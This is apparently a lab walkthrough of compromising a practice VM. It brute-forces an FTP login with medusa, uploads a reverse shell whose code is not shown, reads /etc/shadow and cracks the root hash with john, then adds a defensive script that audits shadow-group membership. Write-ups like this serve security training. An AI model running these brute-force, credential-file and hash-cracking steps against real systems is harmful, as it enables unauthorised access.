When I started the VM, I got the machine's IP.
I started with an nmap scan:
┌──(kali㉿kali)-[~]
└─$ nmap 192.168.1.19
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-12 10:48 EST
Nmap scan report for 192.168.1.19
Host is up (0.0013s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE
21/tcp open ftp
3000/tcp open ppp
Nmap done: 1 IP address (1 host up) scanned in 5.91 seconds
So FTP is open. Let's take a look at it.
┌──(kali㉿kali)-[~]
└─$ ftp 192.168.1.19
Connected to 192.168.1.19.
220 "Hello a.clark, Welcome to your FTP server."
Name (192.168.1.19:kali): anonymous
331 Please specify the password.
Password:
530 Login incorrect.
ftp: Login failed
ftp> exit
221 Goodbye.
So anonymous login is not allowed, but I got a username, a.clark. Let's brute-force the password.
medusa -u a.clark -P /usr/share/wordlists/rockyou.txt -h 192.168.1.19 -M ftp
complete) Password: robert (77 of 14344391 complete)
2025-11-12 11:08:36 ACCOUNT CHECK: [ftp] Host: 192.168.1.19 (1 of 1, 0 complete) User: a.clark (1 of 1, 0 complete) Password: danielle (78 of 14344391 complete)
2025-11-12 11:08:39 ACCOUNT CHECK: [ftp] Host: 192.168.1.19 (1 of 1, 0 complete) User: a.clark (1 of 1, 0 complete) Password: forever (79 of 14344391 complete)
2025-11-12 11:08:41 ACCOUNT CHECK: [ftp] Host: 192.168.1.19 (1 of 1, 0 complete) User: a.clark (1 of 1, 0 complete) Password: family (80 of 14344391 complete)
2025-11-12 11:08:44 ACCOUNT CHECK: [ftp] Host: 192.168.1.19 (1 of 1, 0 complete) User: a.clark (1 of 1, 0 complete) Password: jonathan (81 of 14344391 complete)
2025-11-12 11:08:48 ACCOUNT CHECK: [ftp] Host: 192.168.1.19 (1 of 1, 0 complete) User: a.clark (1 of 1, 0 complete) Password: 987654321 (82 of 14344391 complete)
2025-11-12 11:08:51 ACCOUNT CHECK: [ftp] Host: 192.168.1.19 (1 of 1, 0 complete) User: a.clark (1 of 1, 0 complete) Password: computer (83 of 14344391 complete)
2025-11-12 11:08:54 ACCOUNT CHECK: [ftp] Host: 192.168.1.19 (1 of 1, 0 complete) User: a.clark (1 of 1, 0 complete) Password: whatever (84 of 14344391 complete)
2025-11-12 11:08:54 ACCOUNT CHECK: [ftp] Host: 192.168.1.19 (1 of 1, 0 complete) User: a.clark (1 of 1, 0 complete) Password: dragon (85 of 14344391 complete)
2025-11-12 11:08:54 ACCOUNT FOUND: [ftp] Host: 192.168.1.19 User: a.clark Password: dragon [SUCCESS]
And I found the password: dragon.
- I logged in to FTP with user a.clark and password dragon.
┌──(kali㉿kali)-[~]
└─$ ftp a.clark@192.168.1.19
Connected to 192.168.1.19.
220 "Hello a.clark, Welcome to your FTP server."
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||62179|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> put hello.txt
local: hello.txt remote: hello.txt
229 Entering Extended Passive Mode (|||46558|)
150 Ok to send data.
100% |*********************************************************| 6 28.58 KiB/s 00:00 ETA
226 Transfer complete.
6 bytes sent in 00:00 (2.21 KiB/s)
I can use PUT here. To test this, I uploaded a Node.js reverse shell:
local: rev.js remote: rev.js
229 Entering Extended Passive Mode (|||17037|)
150 Ok to send data.
100% |*********************************************************| 380 1.50 MiB/s 00:00 ETA
226 Transfer complete.
380 bytes sent in 00:00 (121.31 KiB/s)
ftp> ls -la
229 Entering Extended Passive Mode (|||57329|)
150 Here comes the directory listing.
drwxrwxrwx 2 1000 1000 4096 Nov 09 22:31 .
drwxrwxrwx 2 1000 1000 4096 Nov 09 22:31 ..
-rw------- 1 1000 1000 6 Nov 09 22:27 hello.txt
-rw------- 1 1000 1000 380 Nov 09 22:31 rev.js
226 Directory send OK.
ftp>
But I couldn't get the reverse shell. In the VM, though, I was able to log in with these credentials.
- After logging in, I found that the user is also part of the shadow group.
I was easily able to read the /etc/shadow file and get the root hash. Let's crack this:
┌──(kali㉿kali)-[~]
└─$ cat hash.txt
$y$j9T$9VFLJjKZix0Ugj9Yso0Cs.$z0FVk.1CCNx/YRzEmujcz6z4oVqa7YD6QyXd52JxyLD
┌──(kali㉿kali)-[~]
└─$ john --format=crypt hash.txt --wordlist=wordlist.txt
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates left, minimum 96 needed for performance.
0g 0:00:00:00 DONE (2025-11-13 02:04) 0g/s 100.0p/s 100.0c/s 100.0C/s bassman
Session completed.
And the password is bassman. Let's switch user to root.
- Got both the user and root flags:
user = 9f903bRed3aac03f
root = 97b7922RED3e350241
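From the defender's side, the shadow-group membership that exposed the root hash above is something a host audit can catch. The following is an added example, not part of the original write-up: it lists every account that belongs to the shadow group (as a supplementary member or through its primary GID) and flags loose permission bits on the shadow file. The sample file contents, GID 42 and the backup-svc account are constructed for illustration.

```python
import os
import stat

# Constructed sample files (not taken from the target VM).
SAMPLE_GROUP = "root:x:0:\nshadow:x:42:a.clark\nftp:x:116:\n"
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "a.clark:x:1000:1000::/home/a.clark:/bin/bash\n"
    "backup-svc:x:1001:42::/home/backup-svc:/usr/sbin/nologin\n"  # hypothetical account
)


def shadow_readers(group_text, passwd_text, group_name="shadow"):
    """Return accounts in group_name: supplementary members listed in
    /etc/group plus accounts whose primary GID in /etc/passwd is that group."""
    gid, members = None, set()
    for line in group_text.splitlines():
        parts = line.strip().split(":")
        if len(parts) == 4 and parts[0] == group_name:
            gid = parts[2]
            members.update(m.strip() for m in parts[3].split(",") if m.strip())
    if gid is None:  # group not defined on this host
        return []
    for line in passwd_text.splitlines():
        parts = line.strip().split(":")
        if len(parts) >= 4 and parts[3] == gid:
            members.add(parts[0])
    return sorted(members)


def mode_findings(mode):
    """Flag permission bits that widen access to the shadow file."""
    findings = []
    if mode & stat.S_IROTH:
        findings.append("world-readable")
    if mode & (stat.S_IWGRP | stat.S_IWOTH):
        findings.append("writable by group or others")
    return findings


if __name__ == "__main__":
    # On a live Linux host, audit the real files instead of the samples.
    with open("/etc/group") as g, open("/etc/passwd") as p:
        readers = shadow_readers(g.read(), p.read())
    print("accounts in shadow group:", readers or "none")
    mode = stat.S_IMODE(os.stat("/etc/shadow").st_mode)
    print("/etc/shadow mode %o:" % mode, mode_findings(mode) or "ok")
```

Any interactive account this reports can copy the password hashes off the host for offline cracking, so membership should be limited to the service accounts that actually need it.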
Happy Hacking!